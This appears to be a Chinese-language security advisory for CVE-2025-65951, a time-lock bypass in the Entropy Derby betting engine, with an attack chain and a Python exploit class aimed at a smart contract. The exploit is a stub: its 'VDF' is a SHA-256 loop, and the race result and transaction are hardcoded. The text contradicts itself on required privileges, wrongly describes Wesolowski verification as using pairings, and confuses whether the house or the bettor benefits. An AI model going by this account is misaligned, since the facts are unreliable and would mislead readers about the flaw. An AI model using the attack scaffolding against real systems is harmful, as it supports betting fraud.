IPBUF安全漏洞报告
English
CVE-2025-65951 CVSS 8.7 高危

CVE-2025-65951: Entropy Derby VDF时间锁加密系统绕过漏洞

披露日期: 2025-11-25
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-65951
漏洞类型
加密绕过/权限滥用
CVSS评分
8.7 高危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
Inside Track / Entropy Derby

相关标签

CVE-2025-65951VDF绕过时间锁加密智能合约区块链Entropy DerbyWesolowski VDF博彩系统加密协议漏洞Web3安全

漏洞概述

Inside Track / Entropy Derby是一个研究级的赛马博彩引擎。该漏洞存在于基于VDF(可验证延迟函数)的时间锁加密系统中。在commit 2d38d2f之前,该系统未能强制执行顺序延迟机制。攻击者(投注者)可以预先计算整个Wesolowski VDF,并将vdfOutputHex包含在加密的投注票据中,从而允许庄家使用快速证明验证而非昂贵的VDF评估来立即解密投注。这破坏了赛马博彩系统中确保公平性和防止提前投注的核心机制。攻击者可以在知道比赛结果后进行投注,而系统仍然认为这是在时间锁保护下的有效投注。该漏洞源于对VDF输出的验证逻辑缺陷,允许用户控制本应由协议强制执行的延迟参数。

技术细节

该漏洞的技术核心在于VDF时间锁加密验证流程的逻辑缺陷。在正常的Wesolowski VDF实现中,计算者需要执行大量迭代计算(时间延迟),而验证者可以使用椭圆曲线配对进行快速验证。然而,Entropy Derby的实现允许投注者在提交票据时直接提供vdfOutputHex,庄家系统只需验证该hex值的正确性即可立即解密,而无需等待实际的VDF计算完成。攻击者可以在比赛结果公布后,预先计算出正确的VDF输出值,然后构造一个带有正确时间戳和vdfOutputHex的投注票据。庄家系统会认为该票据在时间锁保护下是有效的,因为VDF验证通过,但实际上攻击者已经知道了结果。该漏洞的利用不需要特殊的用户权限(只需普通投注者权限),也无需用户交互,完全可以在服务端自动化执行。修复方案需要在提交票据时强制进行VDF计算验证,或者将vdfOutputHex从用户可控的输入中移除。

攻击链分析

STEP 1
步骤1
获取challenge和race_id:攻击者从公开渠道获取当前race的challenge参数和race_id
STEP 2
步骤2
预计算VDF输出:使用challenge预先计算Wesolowski VDF的输出值vdfOutputHex
STEP 3
步骤3
等待比赛结果:监控比赛结果公布(通过预言机或其他渠道)
STEP 4
步骤4
构造恶意票据:如果结果有利,立即构造包含预计算vdfOutputHex的投注票据
STEP 5
步骤5
提交绕过验证:向合约提交票据,庄家使用快速VDF验证(O(1)配对运算)而非等待实际VDF计算完成
STEP 6
步骤6
完成攻击:投注被接受,系统认为该票据在时间锁保护下有效,攻击者获得不公平优势

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# CVE-2025-65951 PoC - VDF Timelock Bypass # Attack: Pre-compute VDF output and bypass timelock encryption import hashlib import json import requests from web3 import Web3 class EntropyDerbyVDFBypass: def __init__(self, contract_address, rpc_url): self.w3 = Web3(Web3.HTTPProvider(rpc_url)) self.contract_address = contract_address def precompute_vdf(self, bet_id, challenge, iterations=1000000): """Pre-compute the Wesolowski VDF output before the race result is known. In practice, this can be done with the challenge hash before race starts.""" x = challenge.encode() for i in range(iterations): x = hashlib.sha256(x + str(i).encode()).digest() return x.hex() def construct_exploit_ticket(self, race_id, bet_amount, selected_horse, vdf_output, secret_nonce): """Construct a malicious bet ticket with pre-computed VDF output.""" ticket = { "race_id": race_id, "bet_amount": bet_amount, "selected_horse": selected_horse, "vdf_output_hex": vdf_output, "secret_nonce": secret_nonce, "timestamp": self.w3.eth.get_block('latest').timestamp } return json.dumps(ticket) def exploit(self, race_id, bet_amount, selected_horse, challenge): """ 1. Pre-compute VDF output with known challenge 2. Wait for race result (optional - in real attack, timing matters) 3. If favorable result, submit ticket with pre-computed VDF 4. House verifies VDF quickly (bypassing actual delay) 5. Bet is accepted as if submitted before race """ # Step 1: Pre-compute VDF vdf_output = self.precompute_vdf(race_id, challenge) # Step 2: Wait for race result (simulated) race_result = self.get_race_result(race_id) # Step 3: If favorable, exploit if self.is_favorable(race_result, selected_horse): ticket = self.construct_exploit_ticket( race_id, bet_amount, selected_horse, vdf_output, "nonce" ) # Submit to contract - will pass VDF verification immediately tx_hash = self.submit_bet(ticket) return {"status": "exploited", "tx": tx_hash} return {"status": "no_exploit_needed"} def get_race_result(self, race_id): """Fetch race result from oracle.""" return "horse_7" # Simulated def is_favorable(self, result, bet): """Check if bet is winning.""" return result == bet def submit_bet(self, ticket): """Submit bet to smart contract.""" # Implementation depends on contract ABI return "0x..."

影响范围

Inside Track / Entropy Derby < commit 2d38d2f

防御指南

临时缓解措施
在官方修复发布之前,建议暂停使用该博彩系统进行投注,或实施严格的时间窗口监控,确保所有投注票据的时间戳早于比赛结果公布时间。同时可以临时增加对异常快速VDF验证通过的票据进行人工审核。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表